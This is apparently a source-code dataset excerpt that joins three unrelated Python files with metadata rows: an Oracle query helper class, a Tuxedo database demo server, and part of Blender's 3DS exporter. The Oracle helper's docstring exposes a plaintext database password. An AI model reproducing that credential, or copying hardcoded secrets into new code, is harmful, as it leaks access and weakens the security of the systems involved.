                      'password': 'howbuy2016', 'database': 'hbqa', 'port': 1521}
    """
    oracle_url = 'oracle+cx_oracle://{username}:{password}@{dialect}'
    query_all_tab_sql = "SELECT * from {tab_name}"
    query_sql = "SELECT * from {tab_name} where {column_name} like :column_name"
    tab_comments_sql = "SELECT COMMENTS FROM USER_TAB_COMMENTS WHERE TABLE_NAME like :tab_name"

    def __init__(self, username, db_info):
        self.engine = create_engine(self.oracle_url.format(username=username, password=db_info.db_password, dialect=db_info.tms_dsn))
        self.metadata = MetaData(bind=self.engine)

    def tab_metadata(self, tables):
        tabs = []
        for tab in tables:
            try:
                tabs.append(Table(tab, self.metadata, autoload=True))
            except NoSuchTableError:
                continue
        return OrderedDict([(tab.description, tab) for tab in tabs])

    def execute(self, sql, **kwargs):
        with self.engine.begin() as connect:
            return connect.execute(text(sql), **kwargs)

    def with_execute(self, tables, value=None):
        metadata = self.tab_metadata(tables.keys())
        tables_data = []
        with self.engine.begin() as connect:
            for tab in metadata.keys():
                tab_comment = self.get_tab_comment(tab)
                if tables[tab] is None or value is None:
                    result = connect.execute(text(self.query_all_tab_sql.format(tab_name=tab)))
                else:
                    result = connect.execute(text(self.query_sql.format(tab_name=tab, column_name=tables[tab])),
                                             column_name=value if value != '' else '%%')
                col_comments = self.get_col_comments(result, tab=tab)
                tab_map = OrderedDict(tab_name=tab, tab_comment=tab_comment, columns=result.keys(),
                                      col_comments=col_comments, data=result.fetchall())
                tables_data.append(tab_map)
        return tables_data

    def sql_execute(self, sql, **kwargs):
        tables_data = []
        with self.engine.begin() as connect:
            result = connect.execute(text(sql), kwargs)
            """ col_comments = self.get_col_comments(result) """
            tables_data.append(OrderedDict(columns=result.keys(), data=result.fetchall()))
        return tables_data

    def many_execute(self, tables, **kwargs):
        metadata = self.tab_metadata(tables)
        tables_data = []
        with self.engine.begin() as connect:
            for tab in metadata:
                # pass the tables mapping through so sql_format can look up the columns
                sql = self.sql_format(tables, tab, op='LIKE')
                result = connect.execute(text(sql), **kwargs)
                tables_data.append(OrderedDict(tab_name=tab, columns=result.keys(), data=result.fetchall()))
        return tables_data

    def comments_execute(self, tables, **kwargs):
        self.tab_metadata(tables.keys())
        tables_data = []
        with self.engine.begin() as connect:
            for tab in tables.keys():
                sql = self.sql_format(tables, tab, op='LIKE')
                result = connect.execute(text(sql), **kwargs)
                tables_data.append(OrderedDict(tab_name=tab, columns=result.keys(), data=result.fetchall()))
        return tables_data

    def get_tab_comment(self, tab):
        result = self.execute(self.tab_comments_sql, tab_name=tab.upper()).fetchone()
        return result[0]

    def get_col_comments(self, result, tab=None):
        return self._query_col_comments(result.keys(), tab=tab)

    @staticmethod
    def sql_format(tables: dict, tab, op='=', key='AND'):
        sql = "SELECT * FROM {tab_name} {field}"
        if tables.get(tab) is None:
            # the template's placeholders are tab_name/field
            return sql.format(tab_name=tab, field='')
        col = tables.get(tab)
        col_part_sql = ' 1=1 '
        if isinstance(col, str):
            col_part_sql = " {col} {op} :{value} ".format(col=col, op=op, value=col.lower())
        if isinstance(col, list):
            col_part = []
            for col in tables.get(tab):
                col_part.append(" {col} {op} :{value} ".format(col=col, op=op, value=col.lower()))
            col_part_sql = key.join(col_part)
        field_sql = 'WHERE {part_sql}'.format(part_sql=col_part_sql)
        return sql.format(tab_name=tab, field=field_sql)
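
    # Illustrative example (not in the original source): calling
    # sql_format({'T1': ['COL_A', 'COL_B']}, 'T1', op='LIKE') renders
    # "SELECT * FROM T1 WHERE  COL_A LIKE :col_a AND COL_B LIKE :col_b ",
    # whose bind parameters are then supplied via **kwargs in
    # many_execute()/comments_execute().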
    def _query_col_comments(self, cols, tab=None):
        all_col_comments_sql = "SELECT COMMENTS FROM USER_COL_COMMENTS WHERE COLUMN_NAME = :col_name AND COMMENTS IS NOT NULL"
        user_col_comments_sql = "SELECT COMMENTS FROM USER_COL_COMMENTS WHERE TABLE_NAME = :tab_name " \
                                "AND COLUMN_NAME = :col_name "
        with self.engine.begin() as connect:
            col_comments = []
            for col in cols:
                print(col.upper())
                if tab is None:
                    result = connect.execute(text(all_col_comments_sql), col_name=col.upper())
                else:
                    result = connect.execute(text(user_col_comments_sql), tab_name=tab.upper(), col_name=col.upper())
                col_comment = result.fetchone()[0]
                if col_comment is not None:
                    col_comment = col_comment[:35]
                else:
                    col_comment = '空'  # '空' means "empty"
                col_comments.append(col_comment)
        return col_comments

    def update_business_batch_flow(self, trade_dt, sys_code):
        batch_sql = "UPDATE business_batch_flow f SET f.batch_stat='2' WHERE f.trade_dt =:trade_dt AND f.sys_code =:sys_code"
        with self.engine.begin() as connect:
            connect.execute(text(batch_sql), trade_dt=trade_dt, sys_code=sys_code)


if __name__ == '__main__':
    """
    tables = {
        'USER_TAB_COMMENTS': ['TABLE_NAME', 'COMMENTS'],
        'USER_COL_COMMENTS': ['TABLE_NAME', 'COLUMN_NAME', 'COMMENTS']
    }
    table_info = {'table':'USER_TAB_COMMENTS', 'column':['TABLE_NAME', 'COMMENTS'], 'key':'or'}
    SELECT * FROM USER_TAB_COMMENTS T WHERE T.TABLE_NAME LIKE '' OR T.COMMENTS LIKE '';
    SELECT * FROM USER_COL_COMMENTS C WHERE C.TABLE_NAME LIKE '' OR C.COLUMN_NAME OR C.COMMENTS LIKE '';
    """
    table_info = {'table_name': 'USER_TAB_COMMENTS', 'columns': ['TABLE_NAME', 'COMMENTS'], 'key': 'or'}
| 39.821839 | 133 | 0.603983 | 861 | 6,929 | 4.630662 | 0.156794 | 0.055179 | 0.040632 | 0.033358 | 0.374969 | 0.300978 | 0.22473 | 0.207173 | 0.197642 | 0.177076 | 0 | 0.010963 | 0.275942 | 6,929 | 173 | 134 | 40.052023 | 0.783735 | 0.057728 | 0 | 0.2 | 0 | 0.009091 | 0.112674 | 0.008371 | 0 | 0 | 0 | 0 | 0 | 1 | 0.109091 | false | 0.018182 | 0.045455 | 0.009091 | 0.3 | 0.009091 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7f511c69e170794f72c6930c930fe7875bcc4cc | 512 | py | Python | demo/db.py | uldisa/tuxedo-python | 59bd44ee9be1807b63599b48b3af9b4dc4ac4277 | [
"MIT"
] | 4 | 2019-11-05T17:44:29.000Z | 2022-03-21T08:51:14.000Z | demo/db.py | uldisa/tuxedo-python | 59bd44ee9be1807b63599b48b3af9b4dc4ac4277 | [
"MIT"
] | 3 | 2020-12-15T19:39:38.000Z | 2021-11-22T20:54:13.000Z | demo/db.py | uldisa/tuxedo-python | 59bd44ee9be1807b63599b48b3af9b4dc4ac4277 | [
"MIT"
] | 4 | 2020-12-13T17:02:21.000Z | 2021-12-15T22:46:00.000Z |
#!/usr/bin/env python3
import sys
import tuxedo as t
import cx_Oracle


class Server:
    def tpsvrinit(self, args):
        t.userlog('Server startup')
        self.db = cx_Oracle.connect(handle=t.xaoSvcCtx())
        t.tpadvertise('DB')
        return 0

    def DB(self, args):
        dbc = self.db.cursor()
        dbc.execute('insert into pymsg(msg) values (:1)', ['Hello from python'])
        return t.tpreturn(t.TPSUCCESS, 0, args)


if __name__ == '__main__':
    t.run(Server(), sys.argv, 'Oracle_XA')
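
# Client-side sketch (an assumption for illustration, not part of this demo):
# the 'DB' service advertised above would be reached through the binding's ATMI
# call wrapper, e.g. t.tpcall('DB', 'hello'), with tpreturn sending the request
# data back to the caller.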
| 24.380952 | 80 | 0.621094 | 72 | 512 | 4.263889 | 0.638889 | 0.052117 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010204 | 0.234375 | 512 | 20 | 81 | 25.6 | 0.772959 | 0.041016 | 0 | 0 | 0 | 0 | 0.171429 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.2 | 0 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7f624ac745e0d1a0db270c7d92980bf34db4dbc | 38,688 | py | Python | blender/2.79/scripts/addons/io_scene_3ds/export_3ds.py | uzairakbar/bpy2.79 | 3a3e0004ac6783c4e4b89d939e4432de99026a85 | [
"MIT"
] | 2 | 2019-11-27T09:05:42.000Z | 2020-02-20T01:25:23.000Z | io_scene_3ds/export_3ds.py | 1-MillionParanoidTterabytes/blender-addons-master | acc8fc23a38e6e89099c3e5079bea31ce85da06a | [
"Unlicense"
] | null | null | null | io_scene_3ds/export_3ds.py | 1-MillionParanoidTterabytes/blender-addons-master | acc8fc23a38e6e89099c3e5079bea31ce85da06a | [
"Unlicense"
] | 4 | 2020-02-19T20:02:26.000Z | 2022-02-11T18:47:56.000Z |
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# <pep8 compliant>
# Script copyright (C) Bob Holcomb
# Contributors: Campbell Barton, Bob Holcomb, Richard Lärkäng, Damien McGinnes, Mark Stijnman
"""
Exporting is based on 3ds loader from www.gametutorials.com(Thanks DigiBen) and using information
from the lib3ds project (http://lib3ds.sourceforge.net/) sourcecode.
"""
######################################################
# Data Structures
######################################################
#Some of the chunks that we will export
#----- Primary Chunk, at the beginning of each file
PRIMARY = 0x4D4D
#------ Main Chunks
OBJECTINFO = 0x3D3D # This gives the version of the mesh and is found right before the material and object information
VERSION = 0x0002 # This gives the version of the .3ds file
KFDATA = 0xB000 # This is the header for all of the key frame info
#------ sub defines of OBJECTINFO
MATERIAL = 45055 # 0xAFFF // This stored the texture info
OBJECT = 16384 # 0x4000 // This stores the faces, vertices, etc...
#>------ sub defines of MATERIAL
MATNAME = 0xA000 # This holds the material name
MATAMBIENT = 0xA010 # Ambient color of the object/material
MATDIFFUSE = 0xA020 # This holds the color of the object/material
MATSPECULAR = 0xA030 # SPecular color of the object/material
MATSHINESS = 0xA040 # ??
MAT_DIFFUSEMAP = 0xA200 # This is a header for a new diffuse texture
MAT_OPACMAP = 0xA210 # head for opacity map
MAT_BUMPMAP = 0xA230 # read for normal map
MAT_SPECMAP = 0xA204 # read for specularity map
#>------ sub defines of MAT_???MAP
MATMAPFILE = 0xA300 # This holds the file name of a texture
MAT_MAP_TILING = 0xa351 # 2nd bit (from LSB) is mirror UV flag
MAT_MAP_USCALE = 0xA354 # U axis scaling
MAT_MAP_VSCALE = 0xA356 # V axis scaling
MAT_MAP_UOFFSET = 0xA358 # U axis offset
MAT_MAP_VOFFSET = 0xA35A # V axis offset
MAT_MAP_ANG = 0xA35C # UV rotation around the z-axis in rad
RGB1 = 0x0011
RGB2 = 0x0012
#>------ sub defines of OBJECT
OBJECT_MESH = 0x4100 # This lets us know that we are reading a new object
OBJECT_LIGHT = 0x4600 # This lets un know we are reading a light object
OBJECT_CAMERA = 0x4700 # This lets un know we are reading a camera object
#>------ sub defines of CAMERA
OBJECT_CAM_RANGES = 0x4720 # The camera range values
#>------ sub defines of OBJECT_MESH
OBJECT_VERTICES = 0x4110 # The objects vertices
OBJECT_FACES = 0x4120 # The objects faces
OBJECT_MATERIAL = 0x4130 # This is found if the object has a material, either texture map or color
OBJECT_UV = 0x4140 # The UV texture coordinates
OBJECT_TRANS_MATRIX = 0x4160 # The Object Matrix
#>------ sub defines of KFDATA
KFDATA_KFHDR = 0xB00A
KFDATA_KFSEG = 0xB008
KFDATA_KFCURTIME = 0xB009
KFDATA_OBJECT_NODE_TAG = 0xB002
#>------ sub defines of OBJECT_NODE_TAG
OBJECT_NODE_ID = 0xB030
OBJECT_NODE_HDR = 0xB010
OBJECT_PIVOT = 0xB013
OBJECT_INSTANCE_NAME = 0xB011
POS_TRACK_TAG = 0xB020
ROT_TRACK_TAG = 0xB021
SCL_TRACK_TAG = 0xB022
import struct
# So 3ds max can open files, limit names to 12 in length
# this is very annoying for filenames!
name_unique = [] # stores str, ascii only
name_mapping = {} # stores {orig: byte} mapping

def sane_name(name):
    name_fixed = name_mapping.get(name)
    if name_fixed is not None:
        return name_fixed

    # strip non ascii chars
    new_name_clean = new_name = name.encode("ASCII", "replace").decode("ASCII")[:12]
    i = 0

    while new_name in name_unique:
        new_name = new_name_clean + ".%.3d" % i
        i += 1

    # note, appending the 'str' version.
    name_unique.append(new_name)
    name_mapping[name] = new_name = new_name.encode("ASCII", "replace")
    return new_name
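
# Illustrative examples (not part of the original file): non-ASCII characters
# are replaced and names are clipped to 12 characters, e.g.
#   sane_name("Süzanne")            -> b'S?zanne'
#   sane_name("MyVeryLongMaterial") -> b'MyVeryLongMa'
# and a later, different name sharing that 12-character prefix would come back
# as b'MyVeryLongMa.000', b'MyVeryLongMa.001', and so on.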

def uv_key(uv):
    return round(uv[0], 6), round(uv[1], 6)
# size defines:
SZ_SHORT = 2
SZ_INT = 4
SZ_FLOAT = 4

class _3ds_ushort(object):
    """Class representing a short (2-byte integer) for a 3ds file.
    *** This looks like an unsigned short, H is unsigned from the struct docs - Cam ***"""
    __slots__ = ("value", )

    def __init__(self, val=0):
        self.value = val

    def get_size(self):
        return SZ_SHORT

    def write(self, file):
        file.write(struct.pack("<H", self.value))

    def __str__(self):
        return str(self.value)


class _3ds_uint(object):
    """Class representing an int (4-byte integer) for a 3ds file."""
    __slots__ = ("value", )

    def __init__(self, val):
        self.value = val

    def get_size(self):
        return SZ_INT

    def write(self, file):
        file.write(struct.pack("<I", self.value))

    def __str__(self):
        return str(self.value)


class _3ds_float(object):
    """Class representing a 4-byte IEEE floating point number for a 3ds file."""
    __slots__ = ("value", )

    def __init__(self, val):
        self.value = val

    def get_size(self):
        return SZ_FLOAT

    def write(self, file):
        file.write(struct.pack("<f", self.value))

    def __str__(self):
        return str(self.value)


class _3ds_string(object):
    """Class representing a zero-terminated string for a 3ds file."""
    __slots__ = ("value", )

    def __init__(self, val):
        assert(type(val) == bytes)
        self.value = val

    def get_size(self):
        return (len(self.value) + 1)

    def write(self, file):
        binary_format = "<%ds" % (len(self.value) + 1)
        file.write(struct.pack(binary_format, self.value))

    def __str__(self):
        return self.value


class _3ds_point_3d(object):
    """Class representing a three-dimensional point for a 3ds file."""
    __slots__ = "x", "y", "z"

    def __init__(self, point):
        self.x, self.y, self.z = point

    def get_size(self):
        return 3 * SZ_FLOAT

    def write(self, file):
        file.write(struct.pack('<3f', self.x, self.y, self.z))

    def __str__(self):
        return '(%f, %f, %f)' % (self.x, self.y, self.z)


# Used for writing a track
'''
class _3ds_point_4d(object):
    """Class representing a four-dimensional point for a 3ds file, for instance a quaternion."""
    __slots__ = "x", "y", "z", "w"

    def __init__(self, point=(0.0, 0.0, 0.0, 0.0)):
        self.x, self.y, self.z, self.w = point

    def get_size(self):
        return 4 * SZ_FLOAT

    def write(self, file):
        data = struct.pack('<4f', self.x, self.y, self.z, self.w)
        file.write(data)

    def __str__(self):
        return '(%f, %f, %f, %f)' % (self.x, self.y, self.z, self.w)
'''


class _3ds_point_uv(object):
    """Class representing a UV-coordinate for a 3ds file."""
    __slots__ = ("uv", )

    def __init__(self, point):
        self.uv = point

    def get_size(self):
        return 2 * SZ_FLOAT

    def write(self, file):
        data = struct.pack('<2f', self.uv[0], self.uv[1])
        file.write(data)

    def __str__(self):
        return '(%g, %g)' % self.uv


class _3ds_rgb_color(object):
    """Class representing a (24-bit) rgb color for a 3ds file."""
    __slots__ = "r", "g", "b"

    def __init__(self, col):
        self.r, self.g, self.b = col

    def get_size(self):
        return 3

    def write(self, file):
        file.write(struct.pack('<3B', int(255 * self.r), int(255 * self.g), int(255 * self.b)))

    def __str__(self):
        return '{%f, %f, %f}' % (self.r, self.g, self.b)


class _3ds_face(object):
    """Class representing a face for a 3ds file."""
    __slots__ = ("vindex", )

    def __init__(self, vindex):
        self.vindex = vindex

    def get_size(self):
        return 4 * SZ_SHORT

    # no need to validate every face vert. the oversized array will
    # catch this problem
    def write(self, file):
        # The last zero is only used by 3d studio
        file.write(struct.pack("<4H", self.vindex[0], self.vindex[1], self.vindex[2], 0))

    def __str__(self):
        return "[%d %d %d]" % (self.vindex[0], self.vindex[1], self.vindex[2])


class _3ds_array(object):
    """Class representing an array of variables for a 3ds file.

    Consists of a _3ds_ushort to indicate the number of items, followed by the items themselves.
    """
    __slots__ = "values", "size"

    def __init__(self):
        self.values = []
        self.size = SZ_SHORT

    # add an item:
    def add(self, item):
        self.values.append(item)
        self.size += item.get_size()

    def get_size(self):
        return self.size

    def validate(self):
        return len(self.values) <= 65535

    def write(self, file):
        _3ds_ushort(len(self.values)).write(file)
        for value in self.values:
            value.write(file)

    # To not overwhelm the output in a dump, a _3ds_array only
    # outputs the number of items, not all of the actual items.
    def __str__(self):
        return '(%d items)' % len(self.values)
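
# Size bookkeeping example (added for illustration): a _3ds_array holding three
# _3ds_ushort items reports get_size() == 2 + 3 * 2 == 8 bytes, i.e. the leading
# count word plus the items themselves.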

class _3ds_named_variable(object):
    """Convenience class for named variables."""
    __slots__ = "value", "name"

    def __init__(self, name, val=None):
        self.name = name
        self.value = val

    def get_size(self):
        if self.value is None:
            return 0
        else:
            return self.value.get_size()

    def write(self, file):
        if self.value is not None:
            self.value.write(file)

    def dump(self, indent):
        if self.value is not None:
            print(indent * " ",
                  self.name if self.name else "[unnamed]",
                  " = ",
                  self.value)


# the chunk class
class _3ds_chunk(object):
    """Class representing a chunk in a 3ds file.

    Chunks contain zero or more variables, followed by zero or more subchunks.
    """
    __slots__ = "ID", "size", "variables", "subchunks"

    def __init__(self, chunk_id=0):
        self.ID = _3ds_ushort(chunk_id)
        self.size = _3ds_uint(0)
        self.variables = []
        self.subchunks = []

    def add_variable(self, name, var):
        """Add a named variable.

        The name is mostly for debugging purposes."""
        self.variables.append(_3ds_named_variable(name, var))

    def add_subchunk(self, chunk):
        """Add a subchunk."""
        self.subchunks.append(chunk)

    def get_size(self):
        """Calculate the size of the chunk and return it.

        The sizes of the variables and subchunks are used to determine this chunk's size."""
        tmpsize = self.ID.get_size() + self.size.get_size()
        for variable in self.variables:
            tmpsize += variable.get_size()
        for subchunk in self.subchunks:
            tmpsize += subchunk.get_size()
        self.size.value = tmpsize
        return self.size.value

    def validate(self):
        for var in self.variables:
            func = getattr(var.value, "validate", None)
            if (func is not None) and not func():
                return False

        for chunk in self.subchunks:
            func = getattr(chunk, "validate", None)
            if (func is not None) and not func():
                return False

        return True

    def write(self, file):
        """Write the chunk to a file.

        Uses the write function of the variables and the subchunks to do the actual work."""
        # write header
        self.ID.write(file)
        self.size.write(file)
        for variable in self.variables:
            variable.write(file)
        for subchunk in self.subchunks:
            subchunk.write(file)

    def dump(self, indent=0):
        """Dump the chunk to the standard output.

        Dump is used for debugging purposes, to dump the contents of a chunk to the standard output.
        Uses the dump function of the named variables and the subchunks to do the actual work."""
        print(indent * " ",
              "ID=%r" % hex(self.ID.value),
              "size=%r" % self.get_size())
        for variable in self.variables:
            variable.dump(indent + 1)
        for subchunk in self.subchunks:
            subchunk.dump(indent + 1)
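
# Structure note (added for illustration): get_size(), write() and dump() each
# visit a chunk's variables first and its subchunks second, so the size stored
# in a chunk header is always the byte count of the whole subtree, including
# the chunk's own 6-byte (ID + size) header.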
######################################################
# EXPORT
######################################################

def get_material_image_texslots(material):
    # blender utility func.
    if material:
        return [s for s in material.texture_slots if s and s.texture.type == 'IMAGE' and s.texture.image]

    return []
"""
images = []
if material:
    for mtex in material.getTextures():
        if mtex and mtex.tex.type == Blender.Texture.Types.IMAGE:
            image = mtex.tex.image
            if image:
                images.append(image)  # maybe want to include info like diffuse, spec here.
return images
"""

def make_material_subchunk(chunk_id, color):
    """Make a material subchunk.

    Used for color subchunks, such as diffuse color or ambient color subchunks."""
    mat_sub = _3ds_chunk(chunk_id)
    col1 = _3ds_chunk(RGB1)
    col1.add_variable("color1", _3ds_rgb_color(color))
    mat_sub.add_subchunk(col1)

    # optional:
    # col2 = _3ds_chunk(RGB1)
    # col2.add_variable("color2", _3ds_rgb_color(color))
    # mat_sub.add_subchunk(col2)
    return mat_sub
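
# Worked size example (added for illustration): a color subchunk built by the
# function above occupies 15 bytes on disk: its own 6-byte header (2-byte ID
# plus 4-byte size), plus the nested RGB1 chunk's 6-byte header and 3 color bytes.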

def make_material_texture_chunk(chunk_id, texslots, tess_uv_image=None):
    """Make Material Map texture chunk given a seq. of `MaterialTextureSlot`'s.

    `tess_uv_image` is optionally used as image source if the slots are
    empty. No additional filtering for mapping modes is done, all
    slots are written "as is".
    """
    mat_sub = _3ds_chunk(chunk_id)
    has_entry = False

    import bpy

    def add_texslot(texslot):
        texture = texslot.texture
        image = texture.image

        filename = bpy.path.basename(image.filepath)
        mat_sub_file = _3ds_chunk(MATMAPFILE)
        mat_sub_file.add_variable("mapfile", _3ds_string(sane_name(filename)))
        mat_sub.add_subchunk(mat_sub_file)

        maptile = 0

        # no perfect mapping for mirror modes - 3DS only has uniform mirror w. repeat=2
        if texture.extension == 'REPEAT' and (texture.use_mirror_x and texture.repeat_x > 1) \
                or (texture.use_mirror_y and texture.repeat_y > 1):
            maptile |= 0x2
        # CLIP maps to 3DS' decal flag
        elif texture.extension == 'CLIP':
            maptile |= 0x10

        mat_sub_tile = _3ds_chunk(MAT_MAP_TILING)
        mat_sub_tile.add_variable("maptiling", _3ds_ushort(maptile))
        mat_sub.add_subchunk(mat_sub_tile)

        mat_sub_uscale = _3ds_chunk(MAT_MAP_USCALE)
        mat_sub_uscale.add_variable("mapuscale", _3ds_float(texslot.scale[0]))
        mat_sub.add_subchunk(mat_sub_uscale)

        mat_sub_vscale = _3ds_chunk(MAT_MAP_VSCALE)
        mat_sub_vscale.add_variable("mapvscale", _3ds_float(texslot.scale[1]))
        mat_sub.add_subchunk(mat_sub_vscale)

        mat_sub_uoffset = _3ds_chunk(MAT_MAP_UOFFSET)
        mat_sub_uoffset.add_variable("mapuoffset", _3ds_float(texslot.offset[0]))
        mat_sub.add_subchunk(mat_sub_uoffset)

        mat_sub_voffset = _3ds_chunk(MAT_MAP_VOFFSET)
        mat_sub_voffset.add_variable("mapvoffset", _3ds_float(texslot.offset[1]))
        mat_sub.add_subchunk(mat_sub_voffset)

    # store all textures for this mapto in order. This at least is what
    # the 3DS exporter did so far, afaik most readers will just skip
    # over 2nd textures.
    for slot in texslots:
        add_texslot(slot)
        has_entry = True

    # image from tess. UV face - basically the code above should handle
    # this already. No idea why it's here so keep it :-)
    if tess_uv_image and not has_entry:
        has_entry = True

        filename = bpy.path.basename(tess_uv_image.filepath)
        mat_sub_file = _3ds_chunk(MATMAPFILE)
        mat_sub_file.add_variable("mapfile", _3ds_string(sane_name(filename)))
        mat_sub.add_subchunk(mat_sub_file)

    return mat_sub if has_entry else None
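
# Flag note (added for illustration): in add_texslot() above, a 'REPEAT'
# extension with a mirrored, repeated axis sets bit 0x2 of the tiling word
# (3DS' uniform mirror), while a 'CLIP' extension sets the decal bit 0x10.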

def make_material_chunk(material, image):
    """Make a material chunk out of a blender material."""
    material_chunk = _3ds_chunk(MATERIAL)
    name = _3ds_chunk(MATNAME)

    name_str = material.name if material else "None"

    if image:
        name_str += image.name

    name.add_variable("name", _3ds_string(sane_name(name_str)))
    material_chunk.add_subchunk(name)

    if not material:
        material_chunk.add_subchunk(make_material_subchunk(MATAMBIENT, (0.0, 0.0, 0.0)))
        material_chunk.add_subchunk(make_material_subchunk(MATDIFFUSE, (0.8, 0.8, 0.8)))
        material_chunk.add_subchunk(make_material_subchunk(MATSPECULAR, (1.0, 1.0, 1.0)))
    else:
        material_chunk.add_subchunk(make_material_subchunk(MATAMBIENT, (material.ambient * material.diffuse_color)[:]))
        material_chunk.add_subchunk(make_material_subchunk(MATDIFFUSE, material.diffuse_color[:]))
        material_chunk.add_subchunk(make_material_subchunk(MATSPECULAR, material.specular_color[:]))

        slots = get_material_image_texslots(material)  # can be None

        if slots:
            spec = [s for s in slots if s.use_map_specular or s.use_map_color_spec]
            matmap = make_material_texture_chunk(MAT_SPECMAP, spec)
            if matmap:
                material_chunk.add_subchunk(matmap)

            alpha = [s for s in slots if s.use_map_alpha]
            matmap = make_material_texture_chunk(MAT_OPACMAP, alpha)
            if matmap:
                material_chunk.add_subchunk(matmap)

            normal = [s for s in slots if s.use_map_normal]
            matmap = make_material_texture_chunk(MAT_BUMPMAP, normal)
            if matmap:
                material_chunk.add_subchunk(matmap)

            # make sure no textures are lost. Everything that doesn't fit
            # into a channel is exported as diffuse texture with a
            # warning.
            diffuse = []

            for s in slots:
                if s.use_map_color_diffuse:
                    diffuse.append(s)
                elif not (s in normal or s in alpha or s in spec):
                    print('\nwarning: failed to map texture to 3DS map channel, assuming diffuse')
                    diffuse.append(s)

            if diffuse:
                matmap = make_material_texture_chunk(MAT_DIFFUSEMAP, diffuse, image)
                if matmap:
                    material_chunk.add_subchunk(matmap)

    return material_chunk

class tri_wrapper(object):
    """Class representing a triangle.

    Used when converting faces to triangles"""
    __slots__ = "vertex_index", "mat", "image", "faceuvs", "offset"

    def __init__(self, vindex=(0, 0, 0), mat=None, image=None, faceuvs=None):
        self.vertex_index = vindex
        self.mat = mat
        self.image = image
        self.faceuvs = faceuvs
        self.offset = [0, 0, 0]  # offset indices

def extract_triangles(mesh):
    """Extract triangles from a mesh.

    If the mesh contains quads, they will be split into triangles."""
    tri_list = []
    do_uv = bool(mesh.tessface_uv_textures)

    img = None
    for i, face in enumerate(mesh.tessfaces):
        f_v = face.vertices

        uf = mesh.tessface_uv_textures.active.data[i] if do_uv else None

        if do_uv:
            f_uv = uf.uv
            img = uf.image if uf else None
            if img is not None:
                img = img.name

        # if f_v[3] == 0:
        if len(f_v) == 3:
            new_tri = tri_wrapper((f_v[0], f_v[1], f_v[2]), face.material_index, img)
            if (do_uv):
                new_tri.faceuvs = uv_key(f_uv[0]), uv_key(f_uv[1]), uv_key(f_uv[2])
            tri_list.append(new_tri)
        else:  # it's a quad
            new_tri = tri_wrapper((f_v[0], f_v[1], f_v[2]), face.material_index, img)
            new_tri_2 = tri_wrapper((f_v[0], f_v[2], f_v[3]), face.material_index, img)

            if (do_uv):
                new_tri.faceuvs = uv_key(f_uv[0]), uv_key(f_uv[1]), uv_key(f_uv[2])
                new_tri_2.faceuvs = uv_key(f_uv[0]), uv_key(f_uv[2]), uv_key(f_uv[3])

            tri_list.append(new_tri)
            tri_list.append(new_tri_2)

    return tri_list
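
# Illustrative note (not in the original file): a quad with vertex indices
# (0, 1, 2, 3) leaves extract_triangles() as the two triangles (0, 1, 2) and
# (0, 2, 3), both inheriting the face's material index and image.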

def remove_face_uv(verts, tri_list):
    """Remove face UV coordinates from a list of triangles.

    Since 3ds files only support one pair of uv coordinates for each vertex, face uv coordinates
    need to be converted to vertex uv coordinates. That means that vertices need to be duplicated when
    there are multiple uv coordinates per vertex."""

    # initialize a list of UniqueLists, one per vertex:
    # uv_list = [UniqueList() for i in xrange(len(verts))]
    unique_uvs = [{} for i in range(len(verts))]

    # for each face uv coordinate, add it to the UniqueList of the vertex
    for tri in tri_list:
        for i in range(3):
            # store the index into the UniqueList for future reference:
            # offset.append(uv_list[tri.vertex_index[i]].add(_3ds_point_uv(tri.faceuvs[i])))

            context_uv_vert = unique_uvs[tri.vertex_index[i]]
            uvkey = tri.faceuvs[i]

            offset_index__uv_3ds = context_uv_vert.get(uvkey)
            if not offset_index__uv_3ds:
                offset_index__uv_3ds = context_uv_vert[uvkey] = len(context_uv_vert), _3ds_point_uv(uvkey)

            tri.offset[i] = offset_index__uv_3ds[0]

    # At this point, each vertex has a UniqueList containing every uv coordinate that is associated with it
    # only once.

    # Now we need to duplicate every vertex as many times as it has uv coordinates and make sure the
    # faces refer to the new face indices:
    vert_index = 0
    vert_array = _3ds_array()
    uv_array = _3ds_array()
    index_list = []
    for i, vert in enumerate(verts):
        index_list.append(vert_index)

        pt = _3ds_point_3d(vert.co)  # reuse, should be ok
        uvmap = [None] * len(unique_uvs[i])
        for ii, uv_3ds in unique_uvs[i].values():
            # add a vertex duplicate to the vertex_array for every uv associated with this vertex:
            vert_array.add(pt)
            # add the uv coordinate to the uv array:
            # This for loop does not give uv's ordered by ii, so we create a new map
            # and add the uv's later
            # uv_array.add(uv_3ds)
            uvmap[ii] = uv_3ds

        # Add the uv's in the correct order
        for uv_3ds in uvmap:
            # add the uv coordinate to the uv array:
            uv_array.add(uv_3ds)

        vert_index += len(unique_uvs[i])

    # Make sure the triangle vertex indices now refer to the new vertex list:
    for tri in tri_list:
        for i in range(3):
            tri.offset[i] += index_list[tri.vertex_index[i]]
        tri.vertex_index = tri.offset

    return vert_array, uv_array, tri_list
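
# Illustrative note (not in the original file): a vertex shared by faces with
# two different UV pairs is emitted twice in the returned vertex array, once
# per unique UV, and every triangle's indices are remapped to the duplicates.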

def make_faces_chunk(tri_list, mesh, materialDict):
    """Make a chunk for the faces.

    Also adds subchunks assigning materials to all faces."""

    materials = mesh.materials
    if not materials:
        mat = None

    face_chunk = _3ds_chunk(OBJECT_FACES)
    face_list = _3ds_array()

